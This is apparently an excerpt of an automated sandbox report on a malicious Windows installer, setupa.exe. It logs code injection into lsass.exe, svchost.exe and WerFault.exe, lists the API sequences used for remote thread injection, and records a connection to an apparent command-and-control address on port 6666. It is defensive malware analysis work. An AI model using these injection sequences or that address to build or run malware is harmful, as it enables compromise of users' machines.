                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896461B8 __scrt_fastfail,IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6896461B8
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689642905 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF689642905
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC5B2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00000140ADFC5B2C
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD20A8 SetUnhandledExceptionFilter,1_2_00000140ADFD20A8
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFC1B74 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00000140ADFC1B74
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C21CE0 ?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,GetModuleHandleW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?WaitDllInitThread@@YAXXZ,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLogToFile@@YAXPB_W0ZZ,MessageBoxW,_memset,DoEnvironmentSubstW,GetFileAttributesW,GetModuleFileNameW,CoInitialize,ShellExecuteW,CoUninitialize,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,RegCloseKey,?DllGetSettingInt@@YAHPB_W@Z,Sleep,RegCloseKey,?WaitDllInitThread@@YAXXZ,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,?DllGetSettingInt@@YAHPB_W@Z,Sleep,?WaitDllInitThread@@YAXXZ,RegSetValueExW,_memset,DoEnvironmentSubstW,DoEnvironmentSubstW,_memset,DoEnvironmentSubstW,_memset,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,FormatMessageW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,RegCloseKey,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllExecuteNamedCommand@@YA_NPB_W@Z,PeekMessageW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,CoUninitialize,?WaitDllInitThread@@YAXXZ,GetCurrentDirectoryW,PathAppendW,PathAddExtensionW,LoadLibraryExW,?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,GetModuleFileNameW,PathFindFileNameW,SetCurrentDirectoryW,CoInitialize,SHEvaluateSystemCommandTemplate,_memset,ShellExecuteExW,CoUninitialize,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllImportSettingsXml@@YA_NPB_W@Z,CoUninitialize,CoInitialize,?DllExportSettingsXml@@YA_NPB_W@Z,CoUninitialize,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,SetUnhandledExceptionFilter,GetUserNameW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserObjectInformationW,_malloc,GetUserObjectInformationW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,FindWindowExW,FindWindowExW,GetWindowThreadProcessId,CreateMutexW,GetLastError,GetLastError,GetLastError,AllowSetForegroundWindow,FindWindowW,AllowSetForegroundWindow,?FindTaskBar@@YAPAUHWND__@@K@Z,RegisterWindowMessageW,PostMessageW,WaitForSingleObject,ReleaseMutex,?DllLogToFile@@YAXPB_W0ZZ,GetDesktopWindow,FindWindowExW,RegisterWindowMessageW,PostMessageW,ReleaseMutex,OleInitialize,?DllUpdateSettings@@3_2_00C21CE0
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C2E8F7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,3_2_00C2E8F7
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C2A1E9 SetUnhandledExceptionFilter,3_2_00C2A1E9
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C25E64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C25E64
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C24F90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C24F90
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0B0FCB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E0B0FCB
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A8C25 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E0A8C25
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_6E0A9145 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E0A9145
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_1000457B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1000457B
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10006E17 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10006E17
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10003F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10003F7C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02588667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_02588667
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_025868F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_025868F5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFDF60 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_04DFDF60
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04E01FB7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_04E01FB7
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DFF05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_04DFF05A
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_1000457B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1000457B
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10006E17 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_10006E17
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeCode function: 11_2_10003F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10003F7C
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F68667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02F68667
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_02F668F5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_02F668F5
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052BDF60 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,12_2_052BDF60
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052C1FB7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_052C1FB7
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052BF05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_052BF05A

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.239.116.158 6666Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\setupa.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADF30000 protect: page read and writeJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 170000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 28F0000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject code into remote processes
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_10002DC0 Wow64GetThreadContext,VirtualAllocEx,WriteProcessMemory,Wow64SetThreadContext,VirtualFreeEx,3_2_10002DC0
                      Contains functionality to inject threads in other processes
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04DF7830 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_04DF7830
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_052B7830 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,12_2_052B7830
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\setupa.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\setupa.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADF30000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\setupa.exe base: 1F5DCD50000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AA0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754AC0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC80000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\Documents\upupoo-classicshell.exe base: C00000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2D754B20000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 59C0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 50E0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428D8A0000Jump to behavior
                      Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3010000Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 170000Jump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28F0000Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: GetModuleHandleW,?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,Sleep,FindWindowW,FindWindowExW,?DllLogToFile@@YAXPB_W0ZZ,Sleep,GetWindowThreadProcessId,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,CloseHandle,?DllLogToFile@@YAXPB_W0ZZ,?FindTaskBar@@YAPAUHWND__@@K@Z,?FindTaskBar@@YAPAUHWND__@@K@Z,?DllLogToFile@@YAXPB_W0ZZ,Sleep,?ToggleStartMenu@@YAPAUHWND__@@H_N@Z,?g_TaskBar@@3PAUHWND__@@A,GetWindowThreadProcessId,?HookInject@@YGJHIJ@Z,?HookInject@@YGJHIJ@Z,SetWindowsHookExW,GetLastError,?DllLogToFile@@YAXPB_W0ZZ,?g_TaskBar@@3PAUHWND__@@A,PostMessageW, explorer.exe3_2_00C21000
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_04DF7830
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_04DF7830
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe12_2_052B7830
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe12_2_052B7830
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C21CE0 ?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,GetModuleHandleW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?WaitDllInitThread@@YAXXZ,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLogToFile@@YAXPB_W0ZZ,MessageBoxW,_memset,DoEnvironmentSubstW,GetFileAttributesW,GetModuleFileNameW,CoInitialize,ShellExecuteW,CoUninitialize,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,RegCloseKey,?DllGetSettingInt@@YAHPB_W@Z,Sleep,RegCloseKey,?WaitDllInitThread@@YAXXZ,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,?DllGetSettingInt@@YAHPB_W@Z,Sleep,?WaitDllInitThread@@YAXXZ,RegSetValueExW,_memset,DoEnvironmentSubstW,DoEnvironmentSubstW,_memset,DoEnvironmentSubstW,_memset,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,FormatMessageW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,RegCloseKey,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllExecuteNamedCommand@@YA_NPB_W@Z,PeekMessageW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,CoUninitialize,?WaitDllInitThread@@YAXXZ,GetCurrentDirectoryW,PathAppendW,PathAddExtensionW,LoadLibraryExW,?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,GetModuleFileNameW,PathFindFileNameW,SetCurrentDirectoryW,CoInitialize,SHEvaluateSystemCommandTemplate,_memset,ShellExecuteExW,CoUninitialize,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllImportSettingsXml@@YA_NPB_W@Z,CoUninitialize,CoInitialize,?DllExportSettingsXml@@YA_NPB_W@Z,CoUninitialize,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,SetUnhandledExceptionFilter,GetUserNameW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserObjectInformationW,_malloc,GetUserObjectInformationW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,FindWindowExW,FindWindowExW,GetWindowThreadProcessId,CreateMutexW,GetLastError,GetLastError,GetLastError,AllowSetForegroundWindow,FindWindowW,AllowSetForegroundWindow,?FindTaskBar@@YAPAUHWND__@@K@Z,RegisterWindowMessageW,PostMessageW,WaitForSingleObject,ReleaseMutex,?DllLogToFile@@YAXPB_W0ZZ,GetDesktopWindow,FindWindowExW,RegisterWindowMessageW,PostMessageW,ReleaseMutex,OleInitialize,?DllUpdateSettings@@3_2_00C21CE0
                      Source: C:\Users\user\Desktop\setupa.exeProcess created: C:\Program Files\upupoo-classicshell.exe "C:\Program Files\upupoo-classicshell.exe" Jump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                      Source: C:\Users\Public\Documents\upupoo-classicshell.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                      Source: svchost.exe, 0000000C.00000002.3346680855.0000000004900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
